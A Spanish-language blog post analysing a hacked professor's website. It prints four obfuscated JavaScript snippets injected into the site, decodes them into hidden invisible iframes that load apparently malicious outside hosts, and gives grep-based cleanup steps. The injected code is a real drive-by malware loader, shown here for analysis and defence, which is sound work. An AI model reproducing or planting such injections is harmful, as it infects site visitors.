La historia de un troyano.. Ataque de secuencia de comandos (XSS)

Búsqueda

Hagamos que México crezca..

Prefiere el consumo de lo Hecho en México

Posts Recientes

Visitantes

Conversación

melvin: el mejor vpn es vpn ninja, su sitio es www.vpnnija.com
effeselop: High-heeled shoes n your case, a jimmy choo nova nude slingback shoes girl that are how one prevent stop the terrible! The very thought of these disadvantages, high heel sandals after which it check out this new ladies, how suddenly it had not been so pretty! Pure while burden of check carefully the jimmy choo strappy sandals storage room, spring, summer, the fall and winter shoes, I only identify one pair a little high-heeled sandals, exclusion . Irrrve never worn high heel slides in one time, huh, huh! Today it is easy to understand shoe store favorite jimmy choo wedge women's high heel sandals, beautifully turned to that, believe that of to place it on, wind willow waist put a person unique on top of the swaying grace, the temptation fails to stop
Samantha Santin: ola me pueden ayudar con lo basico para un examen de linux , estoy en 10 mo de basica , por favor , gracias
alexandra: hola...tengo problemas para configurar las llamadas y crear los troncales....uso elastix 2.0.3 con asterisk 1.6...y soy nueva en esto..puedo relizar llamadas dentro de una misma oficina, pero no puedo sacarlas fuera, es decir locales e internacionales...necesito asesoria...gracias
Fernando Hernández: Hey! Ya no estan disponibles los posts sobre facturación electrónica en México, podrías pasarme el tutorial o la clase en php? Por favoooor. Gracias
daniel nuñez: buenas soy de venezuela y tengo una duda yo lo que quiero es hacer una iso debian que tenga todos los paquetes necesarios completos y programas como synaptis fortran java los pluging de video y sonido ya instalados osea que tenga todo lo necesario instalado pero sin que sea una instalacion con un cd netinst, es posible ?
Cesar villegas: Buenas!!! oye no tienes programado algún curso?
Urbano: Hola soy de Argentina.
Desde hace un tiempo tengo instaldo Asterbilling SL y me parece un rpoyecto útil e interesante. Ahora me compré un AT 530 con la intension de pasar la tarifa al telefono pero seguramente algo estoy haciendo mal ya que despues de configurar el script con los datos del AMI; MySQL y ejecutar el comando que indica el manual.. no pasa nada, todo sigue igual y no se muestra la tarifa en la pantalla del telefono. Tal vez deba configurar algo tambien en el telefono.. la verdad no se, es que tampoco soy un experto en la materia. Les dejo algunos datos que talvez sean utilespara que me puedan ayudar: Tengo Elastíx 2.0.3 con Asterisk 1.6; FreePBX 2.7.0.3; A2Billing 1.8.1; Astercc 1.4 y Asterbilling SL. Espero que me puedan ayudar; desde ya muchas gracias.
kike: Oye filein.. necesito una cotización de unas FxO para analógicas porfa..
saludos
cristy: hola por favor tengo problemas para conectar agi con asterisk me sale un error de broken pipe, sabes de que se trata???

Nombre:

E-Mail:

URL:

Código Captcha:Escribe el código Captcha que estás viendo

Mensaje:

La historia de un troyano.. Ataque de secuencia de comandos (XSS)

Hace unos días un amigo que estudia la universidad me contacto por el msn, preguntándome porque Google le indicaba que un sitio "podría dañar su computadora", al igual que su antivirus le indicaba información de un troyano al intentar a la página web, le comenté que para que entraba a páginas pornos..

, ja, pero me dijo que no que era un sitio de su profe de la escuela, por lo que me metí a checar que onda solo por curiosidad.
El mencionado sitio es:
http://www.estrategiasempresariales.com.mx/
( USUARIOS DE WINDOWS: CUIDADO !!! )
Como uso Linux pude entrar sin mayor problema, pero vi en la parte de la barra de estado de firefox que intentaba conectarse a otros sitios, por lo que chequé el código y lo que encontré en el encabezado fue lo siguiente:

<script type="text/javascript">

        var nfKIWAgpBTVTQUrZYMzN = "g60g105g102g114g97g109g101g32g119g105g100g116g104g61g34g52g56g48g34g32g104g101g105g103g104g116g61g34g54g48g34g32g115g114g99g61g

        34g104g116g116g112g58g47g47g98g101g115g116g45g109g101g100g45g115g104g111g112g46g99g111g109g47g105g110g46g99g103g105g63g51g38g112g97g114g97g109g101g116g

        101g114g61g98g101g115g116g45g109g101g100g45g115g104g111g112g34g32g115g116g121g108g101g61g34g98g111g114g100g101g114g58g48g112g120g59g32g112g111g115g105g

        116g105g111g110g58g114g101g108g97g116g105g118g101g59g32g116g111g112g58g48g112g120g59g32g108g101g102g116g58g45g53g48g48g112g120g59g32g111g112g97g99g105g

        116g121g58g48g59g32g102g105g108g116g101g114g58g112g114g111g103g105g100g58g68g88g73g109g97g103g101g84g114g97g110g115g102g111g114g109g46g77g105g99g114g111g

        115g111g102g116g46g65g108g112g104g97g40g111g112g97g99g105g116g121g61g48g41g59g32g45g109g111g122g45g111g112g97g99g105g116g121g58g48g34g62g60g47g105g102g

        114g97g109g101g62";

        var cHNCDgmFRKXFpiOMivBk = nfKIWAgpBTVTQUrZYMzN.split("g");

        var PXDfruFQHEdkMrnQXZVp = "";

        for ( var ktvacJmKFovULyADtFTA=1; ktvacJmKFovULyADtFTA<cHNCDgmFRKXFpiOMivBk.length; ktvacJmKFovULyADtFTA++){

                PXDfruFQHEdkMrnQXZVp+=String.fromCharCode(cHNCDgmFRKXFpiOMivBk[ktvacJmKFovULyADtFTA]);

        }

        document.write(PXDfruFQHEdkMrnQXZVp)

</script>

<script type="text/javascript">

        var vIkytowORShQVZqTBFox = "sLU60sLU105sLU102sLU114sLU97sLU109sLU101sLU32sLU119sLU105sLU100sLU116sLU104sLU61sLU34sLU52sLU56sLU48sLU34sLU32sLU104sLU101sLU105sLU

        103sLU104sLU116sLU61sLU34sLU54sLU48sLU34sLU32sLU115sLU114sLU99sLU61sLU34sLU104sLU116sLU116sLU112sLU58sLU47sLU47sLU109sLU111sLU108sLU111sLU46sLU116sLU119sLU

        47sLU105sLU110sLU100sLU101sLU120sLU46sLU112sLU104sLU112sLU34sLU32sLU115sLU116sLU121sLU108sLU101sLU61sLU34sLU98sLU111sLU114sLU100sLU101sLU114sLU58sLU48sLU

        112sLU120sLU59sLU32sLU112sLU111sLU115sLU105sLU116sLU105sLU111sLU110sLU58sLU114sLU101sLU108sLU97sLU116sLU105sLU118sLU101sLU59sLU32sLU116sLU111sLU112sLU

        58sLU48sLU112sLU120sLU59sLU32sLU108sLU101sLU102sLU116sLU58sLU45sLU53sLU48sLU48sLU112sLU120sLU59sLU32sLU111sLU112sLU97sLU99sLU105sLU116sLU121sLU58sLU

        48sLU59sLU32sLU102sLU105sLU108sLU116sLU101sLU114sLU58sLU112sLU114sLU111sLU103sLU105sLU100sLU58sLU68sLU88sLU73sLU109sLU97sLU103sLU101sLU84sLU114sLU

        97sLU110sLU115sLU102sLU111sLU114sLU109sLU46sLU77sLU105sLU99sLU114sLU111sLU115sLU111sLU102sLU116sLU46sLU65sLU108sLU112sLU104sLU97sLU40sLU111sLU112sLU

        97sLU99sLU105sLU116sLU121sLU61sLU48sLU41sLU59sLU32sLU45sLU109sLU111sLU122sLU45sLU111sLU112sLU97sLU99sLU105sLU116sLU121sLU58sLU48sLU34sLU62sLU60sLU

        47sLU105sLU102sLU114sLU97sLU109sLU101sLU62";

        var QWUvRMtrivbeEMdxAZLS = vIkytowORShQVZqTBFox.split("sLU");

        var rsiNSZhTeWRvtmrKykBh = "";

        for ( var gdLkpohqOtIGmrTFQBZv=1; gdLkpohqOtIGmrTFQBZv<QWUvRMtrivbeEMdxAZLS.length; gdLkpohqOtIGmrTFQBZv++){

                rsiNSZhTeWRvtmrKykBh+=String.fromCharCode(QWUvRMtrivbeEMdxAZLS[gdLkpohqOtIGmrTFQBZv]);

        }

        document.write(rsiNSZhTeWRvtmrKykBh)

</script>

<script type="text/javascript">

        var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z

        116z112z58z47z47z114z110z119z46z107z122z47z105z110z100z101z120z46z112z104z112z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z

        115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z

        116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z

        111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z

        109z101z62";

        var kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");

        var TEptzkmsBZolwWqWunem = "";

        for ( var KYLMhcILlLcFQRyPBlHD=1; KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.length; KYLMhcILlLcFQRyPBlHD++){

                TEptzkmsBZolwWqWunem+=String.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);

        }

        document.write(TEptzkmsBZolwWqWunem)

</script>

<script type="text/javascript">

        var eMCeGjolMPJFNuucZWLk = "jc60jc105jc102jc114jc97jc109jc101jc32jc119jc105jc100jc116jc104jc61jc34jc52jc56jc48jc34jc32jc104jc101jc105jc103jc104jc116jc61jc34jc54jc48jc34jc32jc

        115jc114jc99jc61jc34jc104jc116jc116jc112jc58jc47jc47jc121jc111jc117jc45jc102jc111jc117jc110jc100jc45jc105jc116jc46jc111jc114jc103jc47jc105jc110jc100jc101jc120jc46jc112jc104jc

        112jc34jc32jc115jc116jc121jc108jc101jc61jc34jc98jc111jc114jc100jc101jc114jc58jc48jc112jc120jc59jc32jc112jc111jc115jc105jc116jc105jc111jc110jc58jc114jc101jc108jc97jc116jc105jc

        118jc101jc59jc32jc116jc111jc112jc58jc48jc112jc120jc59jc32jc108jc101jc102jc116jc58jc45jc53jc48jc48jc112jc120jc59jc32jc111jc112jc97jc99jc105jc116jc121jc58jc48jc59jc32jc102jc105jc

        108jc116jc101jc114jc58jc112jc114jc111jc103jc105jc100jc58jc68jc88jc73jc109jc97jc103jc101jc84jc114jc97jc110jc115jc102jc111jc114jc109jc46jc77jc105jc99jc114jc111jc115jc111jc102jc

        116jc46jc65jc108jc112jc104jc97jc40jc111jc112jc97jc99jc105jc116jc121jc61jc48jc41jc59jc32jc45jc109jc111jc122jc45jc111jc112jc97jc99jc105jc116jc121jc58jc48jc34jc62jc60jc47jc105jc

        102jc114jc97jc109jc101jc62";

        var varLlMnCAppeCrJJayvn = eMCeGjolMPJFNuucZWLk.split("jc");

        var OEtbynEYKPJgqArbMfdN = "";

        for ( var VTsXKBglzcYNgRpfFtDP=1; VTsXKBglzcYNgRpfFtDP< varLlMnCAppeCrJJayvn.length; VTsXKBglzcYNgRpfFtDP++){

                OEtbynEYKPJgqArbMfdN+=String.fromCharCode( varLlMnCAppeCrJJayvn[VTsXKBglzcYNgRpfFtDP]); 

        }

        document.write(OEtbynEYKPJgqArbMfdN)

</script>

Obvio el código javascript está ofuscado, lo que indica que tanto variables como constantes tienen nombres raros y son sustituidas por su valor ascii para luego ser reinterpretadas y ejecutadas.
Ya limpiando el código se vería algo asi:

<textarea name=infoarea id=infoarea cols=150 rows=50></textarea>

<script type="text/javascript">

        var var1 =  "g60g105g102g114g97g109g101g32g119g105g100g116g104g61g34g52g56g48g34g32g104g101g105g103g104g116g61g34g54g48g34g32g115g114g99g61g

        34g104g116g116g112g58g47g47g98g101g115g116g45g109g101g100g45g115g104g111g112g46g99g111g109g47g105g110g46g99g103g105g63g51g38g112g97g114g97g109g101g116g

        101g114g61g98g101g115g116g45g109g101g100g45g115g104g111g112g34g32g115g116g121g108g101g61g34g98g111g114g100g101g114g58g48g112g120g59g32g112g111g115g105g

        116g105g111g110g58g114g101g108g97g116g105g118g101g59g32g116g111g112g58g48g112g120g59g32g108g101g102g116g58g45g53g48g48g112g120g59g32g111g112g97g99g105g

        116g121g58g48g59g32g102g105g108g116g101g114g58g112g114g111g103g105g100g58g68g88g73g109g97g103g101g84g114g97g110g115g102g111g114g109g46g77g105g99g114g111g

        115g111g102g116g46g65g108g112g104g97g40g111g112g97g99g105g116g121g61g48g41g59g32g45g109g111g122g45g111g112g97g99g105g116g121g58g48g34g62g60g47g105g102g

        114g97g109g101g62";

        var var2= var1.split("g");

        var var3 = "";

        for (var var4=1; var4<var2.length; var4++){

                var3+=String.fromCharCode(var2[var4]);

        }

        document.write(var3);

</script>

<script type="text/javascript">

        var var6= "sLU60sLU105sLU102sLU114sLU97sLU109sLU101sLU32sLU119sLU105sLU100sLU116sLU104sLU61sLU34sLU52sLU56sLU48sLU34sLU32sLU104sLU101sLU105sLU

        103sLU104sLU116sLU61sLU34sLU54sLU48sLU34sLU32sLU115sLU114sLU99sLU61sLU34sLU104sLU116sLU116sLU112sLU58sLU47sLU47sLU109sLU111sLU108sLU111sLU46sLU116sLU119sLU

        47sLU105sLU110sLU100sLU101sLU120sLU46sLU112sLU104sLU112sLU34sLU32sLU115sLU116sLU121sLU108sLU101sLU61sLU34sLU98sLU111sLU114sLU100sLU101sLU114sLU58sLU48sLU

        112sLU120sLU59sLU32sLU112sLU111sLU115sLU105sLU116sLU105sLU111sLU110sLU58sLU114sLU101sLU108sLU97sLU116sLU105sLU118sLU101sLU59sLU32sLU116sLU111sLU112sLU

        58sLU48sLU112sLU120sLU59sLU32sLU108sLU101sLU102sLU116sLU58sLU45sLU53sLU48sLU48sLU112sLU120sLU59sLU32sLU111sLU112sLU97sLU99sLU105sLU116sLU121sLU58sLU

        48sLU59sLU32sLU102sLU105sLU108sLU116sLU101sLU114sLU58sLU112sLU114sLU111sLU103sLU105sLU100sLU58sLU68sLU88sLU73sLU109sLU97sLU103sLU101sLU84sLU114sLU

        97sLU110sLU115sLU102sLU111sLU114sLU109sLU46sLU77sLU105sLU99sLU114sLU111sLU115sLU111sLU102sLU116sLU46sLU65sLU108sLU112sLU104sLU97sLU40sLU111sLU112sLU

        97sLU99sLU105sLU116sLU121sLU61sLU48sLU41sLU59sLU32sLU45sLU109sLU111sLU122sLU45sLU111sLU112sLU97sLU99sLU105sLU116sLU121sLU58sLU48sLU34sLU62sLU60sLU

        47sLU105sLU102sLU114sLU97sLU109sLU101sLU62";

        var var7 = var6.split("sLU");

        var var9 = "";

        for (var var10=1; var10<var7.length; var10++){

                var9+=String.fromCharCode(var7[var10]);

        }

        document.write(var9)

        </script>

<script type="text/javascript">

        var var11 = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z

        116z112z58z47z47z114z110z119z46z107z122z47z105z110z100z101z120z46z112z104z112z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z

        115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z

        116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z

        111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z

        109z101z62";

        var var12 = var11.split("z");

        var var13 = "";

        for (var var14=1; var14<var12.length; var14++){

                var13+=String.fromCharCode(var12[var14]);

        }

        document.write(var13)

        </script>

<script type="text/javascript">

        var var15 = "jc60jc105jc102jc114jc97jc109jc101jc32jc119jc105jc100jc116jc104jc61jc34jc52jc56jc48jc34jc32jc104jc101jc105jc103jc104jc116jc61jc34jc54jc48jc34jc32jc

        115jc114jc99jc61jc34jc104jc116jc116jc112jc58jc47jc47jc121jc111jc117jc45jc102jc111jc117jc110jc100jc45jc105jc116jc46jc111jc114jc103jc47jc105jc110jc100jc101jc120jc46jc112jc104jc

        112jc34jc32jc115jc116jc121jc108jc101jc61jc34jc98jc111jc114jc100jc101jc114jc58jc48jc112jc120jc59jc32jc112jc111jc115jc105jc116jc105jc111jc110jc58jc114jc101jc108jc97jc116jc105jc

        118jc101jc59jc32jc116jc111jc112jc58jc48jc112jc120jc59jc32jc108jc101jc102jc116jc58jc45jc53jc48jc48jc112jc120jc59jc32jc111jc112jc97jc99jc105jc116jc121jc58jc48jc59jc32jc102jc105jc

        108jc116jc101jc114jc58jc112jc114jc111jc103jc105jc100jc58jc68jc88jc73jc109jc97jc103jc101jc84jc114jc97jc110jc115jc102jc111jc114jc109jc46jc77jc105jc99jc114jc111jc115jc111jc102jc

        116jc46jc65jc108jc112jc104jc97jc40jc111jc112jc97jc99jc105jc116jc121jc61jc48jc41jc59jc32jc45jc109jc111jc122jc45jc111jc112jc97jc99jc105jc116jc121jc58jc48jc34jc62jc60jc47jc105jc

        102jc114jc97jc109jc101jc62";

        var var16 = var15.split("jc");

        var var17 = "";

        for (var var18=1; var18<var16.length; var18++){

                var17+=String.fromCharCode(var16[var18]);

        }

        document.write(var17)

</script>

Como podemos ver en en cada código javascript se crea un "string" que contiene información ofuscada, la cuál son números que son el valor ascii de algun caracter, entre cada número y número hay letras los cuales sirven para poder cortar la cadena y generar un arreglo que contendrá cada uno de los valores ascii usando la función split, para luego recorrer el arreglo y convertir el número a su valor ascii, concatenarlo y asi formar nuevamente otra cadena que al final es codigo html que se ejecuta usando la sentencia javascript document.write(codigo).
El código html que oculta, regenera y ejecuta el código malicioso es el siguiente
Script 1

<iframe width="480" height="60" src="http://best-med-shop.com/in.cgi?3&parameter=best-med-shop" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

 

Script 2

<iframe width="480" height="60" src="http://molo.tw/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

 

Script 3

<iframe width="480" height="60" src="http://rnw.kz/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

 

Script 4

<iframe width="480" height="60" src="http://you-found-it.org/index.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

 

Cada código html genera un iframe, el cuál es invisible al visitante de la página web, pero que conecta a otros servidores web, de los cuáles se pueden descargar virus, troyanos, más código malicioso, etc.
¿ Cómo resolverlo ?
Lo ideal es borrar los archivos infectados
Si se usa linux solo bastaría ejecutar el siguiente comando para detectar que archivos están infectados:
find /ruta/del/diretorio/web -type f | xargs grep ALGUNA_DE_LASVARIABLES_QUE_USEN_EN_EL_CODIGO_MALICIOSO
Esto obtendría la lista de archivos infectados.
Solo bastaría borrarlos, subir los originales y luego cambiar los permisos del directorio de preferencia ponerlos en 755, asi como los permisos del propietario del directorio.
Otras consideraciones de seguridad serían :
*No usar conexiones de transferencia de archivos insegura como FTP.
*No conectarse al servidor desde computadoras públicas.